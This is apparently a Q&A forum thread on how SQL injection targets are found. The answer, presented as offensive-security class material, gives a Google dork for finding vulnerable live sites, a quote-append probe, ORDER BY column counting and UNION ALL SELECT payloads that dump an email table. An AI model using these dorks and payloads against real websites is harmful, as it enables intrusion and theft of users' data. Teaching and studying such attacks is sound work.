SQL injection: how to find urls to attack to

Question

The last days I've been reading about SQL injection and most of the url examples I see are like the following:

get_int_filtered.php?id=1
get_int_groupby.php?id=1
get_int_having.php?id=1
get_int_img.php?id=1
get_int_inline.php?id=SELECT+name+FROM+users

(The above are a small example included in the: sqlmapproject/testenv)

I'm missing the part of how someone discovers these urls to attack to. Is it a manual task? For example, by checking the browser developer tools to see the calls to the backend / REST api of a website? Is there a tool that can scan a website and provide a list of urls and HTTP methods to try with (as a second step)?

Answer 1

SQL injection: how to find urls weak to SQL Injection attacks.

First, you have to understand the different types of SQLi, here.

I will speak here about In-band Injection, the classic one. divided into 2 types:

• Error based SQLi
• UNION based SQLi

Error Based SQLI

Goal: Gathering database structure information by Displaying SQL Errors on the target website. In some cases, you can enumerate the entire database with those.

Finding a weak URL: Using Google Dorks. Yes, google is helping you finding weak urls.

• example: inurl:"product.php?id=" site:.ru

Here you are asking Google to list Russian site with product.php?id= in the URL.

Why?

Because we want to find a page which is directly talking to the database. In most of the case you want to search for those patterns: *.php?parameter=n

Alright, but how do I know this URL is weak to SQLi?

You have to put a ' or %27 just after the parameter's number and press enter:

• http[:]//w34ksite.com/product.php?id=1'

If a SQL Error appears there is some probability that this website is injectable.

---

UNION Based SQLI

Goal: Leverages the UNION SQL operator to combine the results of two or more SELECT statements into a single result.

the following block is a material I wrote for my infoSec students.(Offensive security class)

weak site:

http://w34ksite.com

first step

Find an URL that potentially sends SQL queries, like this one:

http://w34ksite.com/products.php?category=1 this URL list products, regrouped in the category named 1

Try to remember that an URL ending with * ? * = * will, in most cases, communicate with a SQL Database, we want to exploit this.

The second step

Translate the products.php?category=1 part of URL into a SQL query. Yes, in this scenario (and in a lot of website in production) this piece of URL is a disguised SQL query:

products.php?category=1 --> SELECT * FROM products WHERE category=1

The third step

Can we inject the category parameter? Let's try to sort the products list by adding ORDER BY n, for instance :

http://w34ksite.com/products.php?category=1 ORDER BY 1 Nothing change.

http://w34ksite.com/products.php?category=1 ORDER BY 2 Wow ! the products order have changed! We probably can inject stuff!

The n number in ORDER BY n indicate from which table's column number you are sorting the output (in this case the product's table column 2). So wait a minute, what happens if I input a number that exceeds the max number of the table? Let's try out.

http://w34ksite.com/products.php?category=1 ORDER BY 3 Order changes again.

http://w34ksite.com/products.php?category=1 ORDER BY 4 Wow! Blank page! We can deduce that the product's table has 3 column. This info is crucial for using the SQL UNION ALL operator.

The fourth step

Planning the attack. So, for example, we want to dump email addresses written in this database. And of course, the email entries are not in the product table. They should be elsewhere... You can guess table's name and more when SQL error appear directly on the web page, but no luck this time, no SQL error appears on w34ksite.com. So let's assume the email's table is named email, because we know this is this CMS default email's table name.

SELECT * FROM email --> http://w34ksite.com/email.php? Of course not. Who will be crazy enough to create a PHP page that lists the database's email? Why not password.php?

Don't forget that products.php?category=1 is our key to communicate with the database and inject things. This key open the database door, the general idea will be to use this key for displaying the content of the email table. So why not displaying the product table content (products.php?category=1) and the email table content? Yes, this is what we will do. By using the UNION ALL operator.

The UNION ALL is quite useful, you can join another SQL request by using it. For instance, let's translate again this URL part into SQL:

products.php?category=1 --> SELECT * FROM products WHERE category=1 right ?

We will now add the new query by using the UNION ALL operator and try to fetch the email table :

SELECT * FROM products WHERE category=1 AND UNION ALL SELECT *, NULL, NULL FROM email

We should have something like this :

http://w34ksite.com/products.php?category=1 UNION ALL SELECT *, NULL, NULL FROM email

Wait, what is the *, NULL, NULL ?

Remember the http://w34ksite.com/products.php?category=1 ORDER BY 4 for testing if we can inject thing? We get a very valuable information: the number of column the product's table have. When using the UNION ALL operator, the table's column number has to be the same.

• NULL: Fake an empty column.
• , : Separate a column from another
• * : display entries of this column

If nothing happens, try to move the * around like this:

http://w34ksite.com/products.php?category=1 UNION ALL SELECT *, NULL, NULL FROM email

http://w34ksite.com/products.php?category=1 UNION ALL SELECT NULL, *, NULL FROM email

http://w34ksite.com/products.php?category=1 UNION ALL SELECT NULL, NULL, * FROM email